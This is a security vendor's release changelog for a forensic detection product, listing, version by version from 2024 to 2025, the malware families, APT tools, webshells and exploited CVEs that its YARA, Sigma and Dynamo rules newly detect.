MITRE ATT&CK Analyzer changelog

This page tracks the updates/changes to AIR's MITRE ATT&CK Analyzer

10.2.0 (29/07/25)

Dynamo Analyzer

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

MITRE ATT&CK Analyzer / YARA

  • Improved detection of SharePoint server exploitation via CVE-2025-53770, including updated patterns for web logs, URI artifacts, and webshells.

  • Added detection for Donut shellcode loader and shellcode, enabling identification of position-independent shellcode used for stealthy in-memory execution of .NET assemblies and other payloads.

  • Expanded detection capabilities for Amadey malware version 5.34 through intrinsic pattern recognition and decryption algorithm identification.

  • Added rules to identify indicators common across multiple ESXi ransomware variants.

  • Introduced detection for Warlock ransomware across Windows and Linux platforms based on unique file and string patterns.

  • New detection for ToolShell, a . NET-based webshell used for system information gathering and cryptographic key extraction on Windows systems.

  • Added SharpAdidnsdump detection, a tool for dumping Active Directory credentials.

  • Introduced detection of dynamic resolving of function addresses from msvcrt.dll, used as a technique for evading detection.

  • Added detection for SharpHost, a tool that collects host system and network environment information.

  • Introduced detection for Python DLL sideloading attempts, highlighting suspicious Python libraries that may facilitate hijacking of execution flow.

  • Other smaller improvements include rule updates, quality of life enhancements, and fixes for false positives.

Sigma

  • Drone has been updated with the most recent Sigma rule updates from SigmaHQ and Hayabusa repositories.

10.1.0 (26/07/25)

Dynamo Analyzer

  • Improved detection of suspicious Windows scheduled tasks by expanding monitored command line path patterns.

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

MITRE ATT&CK Analyzer / YARA

  • Added new detections for APT Patchwork, including its shellcode loader, remote access trojan, and shellcode runner, to identify related malicious activity.

  • Extended Lazarus APT coverage with detections for RootTroy backdoor, malicious implant, trojan, and CryptoBot infostealer, alongside existing detections for RustBucket and other Lazarus malware variants.

  • Introduced detection of Nim-based binaries, covering Windows, Linux, and macOS platforms, to flag potentially suspicious executables that require further analysis.

  • Added detection for the RouterScan hack tool used for network service discovery and router enumeration.

  • Detected LNK files executing PowerShell commands with suspicious paths and those with embedded URLs, highlighting potential initial access techniques.

  • Added detection for payloads created by the commercial evasion framework SHELLTER, commonly used to deploy post-exploitation payloads and evade antivirus and EDR solutions.

  • Other smaller improvements include rule updates, quality of life enhancements, and fixes for false positives.

Sigma

  • Drone has been updated with the most recent Sigma rule updates from SigmaHQ and Hayabusa repositories.

10.0.5 (22/07/25)

Sigma

  • Drone has been updated with the latest Sigma rule enhancements from the SigmaHQ and Hayabusa repositories, including detection for exploitation attempts of CVE-2025-53770.

10.0.4 (21/07/25)

MITRE ATT&CK Analyzer / YARA

  • Added detections for artifacts related to SharePoint server exploitation via CVE-2025-53770, including web log entries, URIs, and ASPX webshells (both source and compiled forms).

10.0.3 (18/07/25)

Dynamo Analyzer

  • Added detection for anomalous activity volume in HubSpot users by comparing recent activity to historical baselines.

  • Implemented identification of suspicious first-time user activities in HubSpot within the first day of account creation, focusing on potentially destructive or high-privilege actions.

  • Introduced detection for rapid successive actions in HubSpot audit logs, flagging potential automated or compromised account behavior based on action frequency and speed.

  • Created a comprehensive detector for suspicious activities in HubSpot audit logs, covering user management, API key management, data export, off-hours activity, authentication failures, and configuration changes.

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

  • Improved Windows Osquery detection by enriching WinSCP Host Key extraction with associated user information through joined registry and user datasets.

MITRE ATT&CK Analyzer / YARA

  • Added detection for RansomHub ransomware, a cross-platform threat known for aggressive encryption and ransom note deployment.

  • Added detection for the Veeamp credential dumping tool, targeting SQL databases used by Veeam backup management software.

  • Other smaller improvements include detection updates, quality-of-life enhancements, and fixes for false positives.

10.0.2 (15/07/25)

MITRE ATT&CK Analyzer / YARA

  • Improved detection of multiple native IIS malware families, including IIS-Raid variants, RGDoor, IIStealer, ISN, IISpy, IISerpent, and other groups targeting IIS servers.

  • Added identification of a malicious IIS module used in SEO poisoning attacks.

  • Refined detection logic to focus on filesystem context for better accuracy and reduced false positives.

  • Other smaller improvements include rule updates, quality-of-life enhancements, and fixes for false positives.

10.0.1 (15/07/25)

Dynamo Analyzer

  • Added detection for cached WinSCP host keys in the Windows registry, which may indicate unauthorized use of WinSCP for remote file transfers.

10.0.0 (14/07/25)

Dynamo Analyzer

  • Improved detection of scheduled tasks with suspicious extensions by adding exclusions for specific system paths.

  • Updated detection logic for services to better identify unusual paths used by adversaries.

  • Enhanced identification of various hacker tool names commonly found in forensic evidence.

MITRE ATT&CK Analyzer / YARA

  • Added detection for a tool demonstrating multiple methods for bypassing application whitelisting on Windows systems.

  • Included rules for identifying Office template injection exploits commonly used for defense evasion.

  • Enhanced detection capabilities for process injection indicators using common patterns.

  • Implemented identification measures for suspicious Cmdl32 usage, often leveraged as a LOLBin for stealthy command execution.

  • Developed a rule to detect the use of the SOAPHound tool, which is associated with Active Directory enumeration.

  • Updated CobaltStrike beacon detection to include specific DLL characteristics signs.

  • Other smaller improvements include rule updates, quality-of-life enhancements, and fixes for false positives.

9.6.1 (30/06/25)

Dynamo Analyzer

  • Improved detection of suspicious service paths by including all fields in query results.

9.6.0 (30/06/25)

Dynamo Analyzer

  • Added comprehensive detection for Model Context Protocol (MCP) server activities on Windows endpoints, which includes configuration files, environment variables, network activity, processes, and installed programs. These detections aim to identify unauthorized access to AI assistants and potential data exfiltration capabilities.

MITRE ATT&CK Analyzer / Yara

  • Implemented detection for various native IIS malware families, including IIS-Raid derivatives, RGDoor, IIStealer, ISN, IISpy, IISerpent, and others. Each detection targets specific characteristics of the respective malware family.

  • Updated detection rule for samples protected by the ConfuserEx protector, enhancing identification accuracy.

  • Other, more minor improvements include rule updates, quality-of-life enhancements, and fixes for false positives.

9.5.0 (04/07/25)

YARAS

  • Added detection for KoiLoader/KoiStealer malware.

  • Added detection for various documented hacker tools used by the threat actors in recent operations.

  • Quality of life and false positive fixes.

  • Many other smaller rules are in place for detecting various Initial Access IOCs.

Dynamo

  • Updated the list of various hacker tools commonly found in forensic evidence.

9.2.2 (07/05/25)

YARA

  • Added detection for Python-based Anubis backdoor used by FIN7, a financially motivated threat group.

  • Added detection for QDoor backdoor.

  • Added detection for SectopRAT, aka ArechClient2.

  • Added detection for Lazarus APT BeaverTail malware and its infostealer component.

  • Added detection for a new variant of Stealcstealer.

  • Added detection for EarthKurma APT Dunloader backdoor.

Dynamo

  • Added identification of risky Windows Registry settings such as enabled RDP, enabled vulnerable SMB, usage of unencrypted WDigest protocol, and more.

9.0.1 (02/04/25)

YARA

  • Updated detection of SystemBC multiplatform proxy malware.

  • Updated detection of Play ransomware variant and the tools used by this threat actor.

  • other small fixes and improvements.

9.0.0 (02/04/25)

YARA

  • Added detection for HUI Loader that has been used since at least 2015 by China-based threat groups, including Cinnamon Tempest and menuPass, to deploy malware on compromised hosts. (S1097)

  • Added detection for ShadowPad backdoor. ShadowPad is a well-known and privately sold modular backdoor, known to only be supplied to China-aligned APT groups. (S0596)

  • Added detection for SodaMaster that has been used by Chinese threat actors to download and execute payloads since at least 2020. (S0627)

  • Added detection for SparowDoor backdoor linked to the Chinese FamousSparrow threat actor.

  • Added detection for ABYSSWORKER rootkit driver, deployed to target and silence different EDR vendors.

  • Enhanced detection of samples using compromised/revoked digital signatures.

  • Added detection for various tools used for credentials stealing, brute force, network discovery, and reverse proxy techniques.

  • Many other smaller fixes and improvements.

Dynamo

  • Enhanced identification of the latest hacker tool names found in forensic evidence that are commonly used in attacks.

8.7.0 - 8.7.1 (05/03/25)

YARA

  • Added detection for Winos command and control framework, targeting users in Taiwan in latest campaign.

  • Improved detection of ransomware variants targeting the ESXi platform.

  • Added detection for Sosano backdoor, targeting organizations with a distinct interest in aviation and satellite communications, along with critical transportation infrastructure.

8.6.3 (03/03/25)

YARA

  • Added detection for Sagerunex backdoor attributed to Lotus Blossom APT. (G0030)

8.6.2 (03/03/25)

YARA

  • Added detection for Lazarus APT attributed InvisibleFerret and BeaverTail malware variants. (G0032)

  • Enchanced detection of malicious samples targetting crypto related browser extensions.

8.6.1 (03/03/25)

YARA

  • Improved detection of LightSpy windows variant, developed by Chinese attributed APT41. (G0096)

  • Added detection for macOS variant of malware dubbed Rustdoor, possibly linked with notorious Windows ransomware groups.

8.6.0 (26/02/25)

YARA

  • Added detection for Gh0stRAT, a remote access trojan that has been used to hack into some of the most sensitive computer networks on Earth. (S0032)

  • Added detection for macOS capable ransomware with exfiltration capabilities, masquerading itself as LockBit. (T1486)

  • Enhanced detection of vulnerable drivers used for privilege escalation and defense evasion purposes. (T1068)

Dynamo

  • Enhanced identification of forensic evidence where PowerShell executed encoded content. (T1027.010)

8.5.1 (12/02/25)

YARA

  • Minor fixes.

8.5.0 (11/02/25)

YARA

  • Added detection for custom backdoor attributed to Lazarus APT group dubbed Deceptive Development spreading via fake job offers. (G0032)

  • Added detection for hack tools used for dumping Veeam credentials stored in MSSQL databases. (T1555)

  • Added detection for ValleyRAT backdoor attributed to Silver Fox cybercrime group.

  • Other small fixes and improvements.

Dynamo

  • Enhanced identification of hack tools found in forensic evidence.

8.4.0 (26/01/25)

YARA

  • Minor fixes.

8.3.0 (26/01/25)

YARA

  • Minor fixes.

8.2.4 (30/12/24)

YARA

  • Added detection for malicious extensions involved in the Cyberhaven compromise and a broader campaign targeting Chrome extensions for credential-stealing purposes.

8.2.0 (26/12/24)

YARA

  • FP fixes and verdict improvements.

8.1.0 (26/12/24)

YARA

  • Access logs detection improvement. We now tend to show the entire line instead of matching string of interest only.

  • Added detection for BrazenBamboo APT.

  • FP fixes

Dynamo

  • HTML smuggling improvement and FP fixes.

  • Improved description of rules.

8.0.2 (04/12/24)

YARA

  • Added detection for GHOSTSPIDER backdoor, attributed to the Chinese Earth Estries APT group, primarily targeting critical industries such as telecommunications and government entities

  • Added detection for Pygmy Goat, which was discovered on Sophos XG firewall devices, providing backdoor access to the device.

8.0.1 (28/11/24)

YARA

  • Added detection for STEALHOOK, an exfiltration tool used by OilRig (APT34) group. (G0049)

  • Added detection for tools designed to exploit CVE-2024-30088, a Windows Kernel elevation of privilege vulnerability. (T1068)

8.0.0 (28/11/24)

YARA

  • Enhanced identification of Vulnerable and Malicious drivers that are weaponized by threat actors for defense evasion purposes. (T1068)

  • Added detection for EDRSandblast, a hack tool designed to bypass EDR detection. (T1562)

  • Enhanced detection of various tools used by threat actors for Credentials Access, Discovery, Lateral Movement, and other TTPs.

7.3.0 (28/11/24)

YARA

  • Added detection for Medusa ransomware.

  • Added detection for Ymir ransomware.

  • Yara rules that scan Access Logs for signs of exploitation attempts are now updated to show the entire line where suspicious activity was detected.

7.3.0 (28/11/24)

YARA

  • Added detection for RDP configuration files that include unusual sets of permissions such as access to audio, disks, and the clipboard. (T1219)

  • Added detection for various hack tools designed to extract passwords from password stores. (T1555)

7.2.0 (28/10/24)

YARA

  • Added detection for BianLian ransomware. (T1486)

  • Enhanced identification of credential stealers that collect browser data. (T1005)

  • Enhanced detection of Cobalt Strike. (S0154)

  • Enhanced detection of memory dumpers and scripts designed to extract and decrypt Kerberos tickets. (T1558)

7.1.0 (18/10/24)

YARA

  • Added detection for DragonForce ransomware binaries. (T1486)

  • Added detection for Angry IP Scanner. (T1018)

7.0.0 (18/10/24)

YARA

  • Added detection for Clop and MedusaLocker ransomware binaries observed in September 2024. (TA0040)

  • Enhanced detection of the Defender Control hack tool often used to disable Microsoft Defender. (T1562.001)

  • Added detection for HRSword, which threat actors use for defense evasion. (T1562)

  • Multiple minor FP fixes and performance improvements.

6.3.1 (08/08/24)

YARA

  • Added detection for Bugsleep backdoor attributed to the Iranian MuddyWater threat actor.

6.3.0 (07/08/24)

YARA

  • Added detection for Java-based STRRAT and related IOCs.

  • Added detection for APT group dubbed StormBamboo/Evasive Panda that compromised an internet service provider (ISP) in order to poison DNS responses for target organizations.

6.2.0 (07/08/24)

YARA

  • Andariel/Lazarus IOCs update. (G0138, G0032)

  • Added detection for Maui ransomware.

YARA

  • Andariel/Lazarus IOCs update. (G0138, G0032)

  • Added detection for Maui ransomware.

6.1.1 (07/08/24)

YARA

  • Andariel IOCs update. (G0138)

  • Improved detection of Metasploit implants for Linux.

6.1.0 (07/08/24)

YARA

  • Added detection for IOCs attributed to North Korean Lazarus/Andrariel groups outlined in CISA report. (G0032, G0138)

  • Added detection for open-source Lilith RAT. (T1219)

6.0.0 (07/08/24)

YARA

  • Improved detection of Shellcode loaders.

  • Added detection for the SharpSploit post-exploitation tool.

  • Other minor fixes and improvements.

5.7.0 (17/07/24)

YARA

  • Added detection for Pirpi backdoor attributed to the Chinese APT3 group. (G0022)

  • Added detection for IOCs used in the latest attacks by the APT41 group. (G0096)

  • Added detection for URL Shortcuts, taking advantage of CVE-2024-38112 vulnerability.

5.6.2 (17/07/24)

Sigma

  • Improved detection of PowerShell processes using base64 obfuscation.

5.6.1 (17/07/24)

Dynamo

  • Improved detection of CobaltStrike service installation.

5.6.0 (17/07/24)

YARA

  • Added detection for known malicious VSCode extensions.

  • Improved detection of successful ProxyShell exploitation found in server logs.

  • Various quality of life and FP fixes.

5.5.2 (17/07/24)

YARA

  • Improved detection of ASPX compiled DLL webshells.

5.5.1 (17/07/24)

YARA

  • Added lsass exclusion for memory scanning. (internal only changelog)

5.5.0 (17/07/24)

YARA

  • Added detection for malware known as DISGOMOJI, taking advantage of emojis for C2 communication.

  • Added detection for the Durian backdoor attributed to Kimsyky ATP group. (G0094)

  • Added detection for BadSpace backdoor.

  • Various quality of life and FP fixes.

Dynamo

  • Improved detection of Registry Run entries and Scheduled Tasks with base64 encoded PowerShell keyword.

5.4.0 (10/06/24)

YARA

  • Added detection for exploitation attempt indicators of a critical argument injection vulnerability in PHP (CVE-2024-4577).

  • Added detection for BitRAT backdoor.

  • Added detection for OrcusRAT backdoor.

  • Added detection for LightSpy malware targeting macOS.

  • Improved identification of path traversal indicators in server logs that suggest exploitation attempts.

  • Improved detection of .NET obfuscated/protected binaries.

5.3.1 (31/05/24)

YARA

  • Updated list of path traversal attacks.

5.3.0 (31/05/24)

YARA

  • Added detection for CrimsonRAT. (S0115)

  • Improved detection of the IcedID Trojan. (S0483)

  • Improved detection of ISO archives with hidden scripts and signs of DLL Side-loading technique. (T1574.002)

  • Added detection for the Mythic C2 framework agent.

Dynamo/osquery

  • Added identification of possible ARP poisoning/spoofing.

5.2.0 (22/05/24)

YARA

  • Added detection for DiceLoader trojan attributed to FIN7. (G0046)

  • Added detection for Ebury botnet. (S0377)

  • Added detection for Latrodectus trojan. (T1218.011, T1055, T1053.005, T1070.004, T1059.003)

  • Added detection for macOS Cuckoo and Atomic stealer. (T1059.002, T1555)

  • Enhanced detection for Relective Code Loading technique. (T1620)

  • Enhanced detection of Powershell based loaders. (T1059.001)

  • Added detection for Kinsing miner. (S0599)

  • Improved identification of vulnerable and malicious drivers used for privilege escalation. (T1068)

  • Various other fixes and improvements.

Dynamo

  • Enhanced detection of network discovery and PowerShell commands in forensic evidence.

5.1.2 (17/05/24)

YARA

  • Improved detection of the Metasploit framework.

  • Added detection of masqueraded LUA based samples. (T1036.008)

  • Added detection for the GooseEgg hack tool, which is used for privilege escalation and credential access, attributed to APT28. (G0007)

5.1.1 (17/05/24)

YARA

  • Added detection for Rawdoor, a backdoor attributed to Chinese APT31 group. (G0128)

  • Added detection for CR4T backdoor discovered in campaign targeting government entities in the Middle East.

  • Improved detection of Pupy opensource, cross-platform C2 and post-exploitation framework constantly being used by various threat actors.

  • Improved detection of Linux-based webshells. (T1505.003)

  • Improved detection or ZIP archives with indicators of DLL sideloading technique. (T1574.002, T1566)

5.1.0 (18/04/24)

YARA

  • Added detection for Kapeka backdoor attributed to Sandworm APT44 group. (G0034)

  • Improved/added detection of various malware such as DarkGate, Nitrogen, FatalRAT, WikiLoader.

  • Added detection for IOCs related to GlobalProtect CVE-2024-3400.

  • Improved detection of Python-based loaders. (T1059.006)

  • Improved detection of various shellcode implants e.g. Metasploit-based. (T1620)

  • Added detection for IOCs masqueraded as certificates. (T1036.008, T1027)

  • Improved detection of obfuscated Javascript-based droppers, suspicious base64 encoded IOCs, and PowerShell-based loaders. (T1620, T1059.001, T1059.007, T1027)

  • And many other smaller improvements.

5.0.2 (18/04/24)

Sigma

  • Powershell detection update

5.0.1 (11/04/24)

YARA

  • Vidar stealer FP fix.

5.0.0 (09/04/24)

YARA

  • Added detection for Linux local privilege escalation exploit for CVE-2024-1086.

  • Added detection for various APT groups related IOCs, including APT28, APT29, APT33, and APT42. (G1006, G0007, G0016, G0064, G0059)

  • Added detection for Dark Crystal a.k.a DCRat.

  • Added detection for Sharpire post-exploitation agent. (S0363)

  • Enhanced detection of obfuscated Golang-based binaries. (T1027)

  • Enhanced detection of Nim-based binaries.

  • Enhanced detection of RMM tools and software. (T1219)

  • Enhanced identification of misplaced binaries is often used for DLL Side-loading. (T1574.002)

  • Enhanced identification of potentially misplaced script-based samples is often used for masquerading purposes. (T1036.005)

  • Enhanced identification of samples abusing double extension to trick users into executing malicious files. (T1036.007)

Dynamo

  • Enhanced detection of various hacker commands found in areas such as PowerShell commands, console, and console history.

  • Vastly improved detection of RMM software commonly abused by malicious actors. (T1219)

4.3.1. (01/04/24)

YARA

  • Added detection for backdoored binaries and indicators of compromise found in XZ Utils 5.6.0 and 5.6.1. (CVE-2024-3094)

4.3.0 (22/03/24)

YARA

  • Added detection for Xdealer malware attributed to the China-nexus threat actor tracked as Earth Lusca. (G1006)

  • Added detection for custom malware dubbed DinodasRAT targeting government organizations. (G1006)

  • Added detection for binaries signed by a D2innovation certificate attributed to the Kimsuky APT group. (G0094)

  • Added detection for Lumma information stealer (aka LummaC2 Stealer). (T1082, T1622, T1140, T1562, T1119, T1005, T1071, T1020)

  • Added detection for Meduza info stealer. (T1614, T1082, T1113, T1552, T1571)

  • Added detection for indicators found in compiled ASPX Web Shell DLLs. (T1505.003)

  • Enhanced detection of samples having a suspicious keyword in their PDB path (e.g. Trojan, Shellcode). (TA0005)

  • Enhanced detection of Remote Access Software Tools commonly used in ransomware attacks. (T1219)

  • Enhanced detection of misplaced files masquerading as legitimate Windows binaries. (T1036.005)

  • Enhanced detection of malicious samples and scripts obfuscated with XOR, AES and custom encoding. (T1027)

  • Enhanced detection of samples abusing double extension in order to hide true file type. (T1036.007)

  • Enhanced detection of LNK files executing suspicious PowerShell commands. (T1059.001, T1204.002)

  • Enhanced detection of older exploits such as Zerologon, BlueKeep and more. ( T1021, T1068)

  • Various other rules, fixes and performance improvements.

Dynamo

  • Updated Hacker Tool list with new keywords for hunting in forensic artifacts such as Applications, Cronjobs, Downloads, MFT, Prefetch, Processes, Registry, Scheduled Tasks, Services, ShellBags, Shell History, and Shimcache. (T1588.002)

  • Updated detections of Remote Management Software Website domains in DNS Cache, indicating potentially unwanted usage of remote access software. (T1219)

4.2.3 (05/03/24)

YARA

  • Added detection for indicators of compromise indicating exploitation attempts of two recent vulnerabilities in JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (CVE-2024-27198 and CVE-2024-27199)

  • Added detection for the Linux variant of Bifrost (aka Bifrose). Bifrost is a remote access Trojan (RAT) that allows an attacker to gather sensitive information, like hostname and IP address. (T1219)

  • Added detection for Xeno RAT; an intricately designed malware, crafted with advanced functionalities, conveniently accessible at no cost on GitHub. (T1059.003, T1053.005, T1622, T1497, T1055, T1071.00)

  • Added detection for suspicious unsigned executables protected with Obsidium protector. (T1027.002)

  • Added detection for FudModule rootkit exploiting CVE-2024-21338 kernel elevation of privilege vulnerability. (T1068)

  • Enhanced detection of files found outside of their default location which is a very popular way of hiding malicious files under a known name of a legitimate Windows component. (T1036.005)

  • Enhanced detection of CobaltStrike beacons. (S0154)

4.2.2 (27/02/24)

YARA

  • Added detection for indicators of compromise, indicating exploitation attempts of two recent vulnerabilities in ConnectWise ScreenConnect. (CVE-2024-1709 & CVE-2024-1708)

4.2.1 (24/02/24)

YARA

  • Restored %WINDIR%\Temp to depth 2 recursion for now.

4.2.0 (23/02/24)

YARA

  • Restored memory scan [INTERNAL USAGE detail]

  • Added detection for the latest TinyTurla IOCs (G0010)

  • Improved detection of Linux Shell scripts commonly used in malicious attacks. Examples include log removal, public DNS insertion, manipulation of root SSH keys, and other post-exploitation commands.

  • Enhanced detection of various hack tools mentioned in the latest malware campaigns.

4.1.0 (20/02/24)

YARA

  • Added detection for emails exploiting the Microsoft Outlook CVE-2024-21413 vulnerability.

  • Enhanced detection of the Silver red team framework implant. (S0633)

  • Added detection for IOCs abusing the Mockbin service for malicious purposes. (T1090.004, T1102)

  • Added detection for IOCs designed to capture NTLMv2 hashes. (T1187)

  • Enhanced detection of binaries named after legitimate Windows executables for masquerading and defense evasion purposes. (T1036.005)

  • Enhanced detection of IOCs with base64 encoded keywords such as Powershell, WScript, and many more. (T1027)

  • Enhanced detection of ESXi ransomware variants. (TA0040)

  • Enhanced detection for many other IOCs with references to suspicious locations and suspicious commands, such as disabling UAC, enabling RDP, and more. (T1562.001, T1059.001, T1021.001, T1112)

  • Various other fixes and performance improvements.

Dynamo

  • Added detection for Crypto Mining Pool Address in DNS Cache and Browser History. (T1496)

  • Added detection for registry run entries executing PowerShell command to read data stored in Registry. (T1547.001, T1059.001)

  • Added detection for registry run entries executing suspicious PowerShell commands. (T1547.001, T1059.001)

  • Updated list of Widely Abused Top-Level Domains found in DNS Cache. (T1583.001)

  • Updated Hacker Tool list with over 100 new keywords for hunting in forensic artifacts such as Applications, Cronjobs, Downloads, MFT, Prefetch, Processes, Registry, Scheduled Tasks, Services, ShellBags, Shell History, and Shimcache. (T1588.002)

  • Updated detections for hunting Large File Transfer Websites in DNS Cache, which can be used for uploading sensitive/confidential data. (T1567.002)

4.0.1 (05/02/24)

YARA

  • Added detection for C# and dictionary-based webshells.

  • Enhanced detection of JSP webshells.

  • Enhanced detection of directory traversal and XSS injection indicators found in server logs.

  • Enhanced detection of ProxyShell and ProxyNotShell vulnerabilities.

  • Added detection of various Linux exploits.

  • An updated list of vulnerable and malicious drivers from LOL Drivers project.

  • Added detection for binaries using potentially compromised AnyDesk certificate.

  • Other minor fixes.

Dynamo

  • Minor FP fixes.

3.5.2 (22/01/24)

YARA

  • Added more detection rules for IOCs observed in the exploitation of Ivanti VPN. (CVE-2023-46805 and CVE-2024-21887)

  • Added detection for IOCs related to Russian threat group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto) Reference: https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/

3.5.1 (22/01/24)

YARA

  • Added detection for IOCs linked to Iranian and Russian APT groups such as BlueBravo and Siamesekitten. (APT29, G1001)

  • Added detection for IOCs linked to Iranian OilRig APT. (G0049)

  • Improved detection of Lazarus APT-related IOCs. (G0032)

  • Added detection of Outlook CVE-2023-23397 vulnerability exploitation.

  • Improved identification of remote access software. (T1219)

  • Improved detection of PowerShell scripts loading obfuscated content directly into memory. (T1059.001, T1620)

  • Added detection for archives exploiting Baracuda ESG vulnerability CVE-2023-2868.

  • Added detection for implants related to Alchimist attack framework.

  • Added detection of pkexec CVE-2021-4034 vulnerability exploitation.

  • Improved detection of various hacktools used for port scanning, brute force, and privilege escalation.

  • Improved detection of mixed casing keywords often used as a way of obfuscation. (T1027)

  • Improved detection of double file extension masquerading in archives such as ZIP or RAR. (T1036.007)

  • Enhanced detection of indicators of various exploitation attempts, including Log4j, SQL Injection, XSS attacks, path traversal attacks, and more. (T1190)

  • Added detection for IOCs found in the exploitation of Ivanti Connect Secure VPN. (CVE-2023-46805, CVE-2024-21887) and more

Dynamo

  • Added detection for scheduled tasks executing Certutil. (T1053.005, S0160)

Other

  • Various FP fixes and performance improvements.

Last updated

Was this helpful?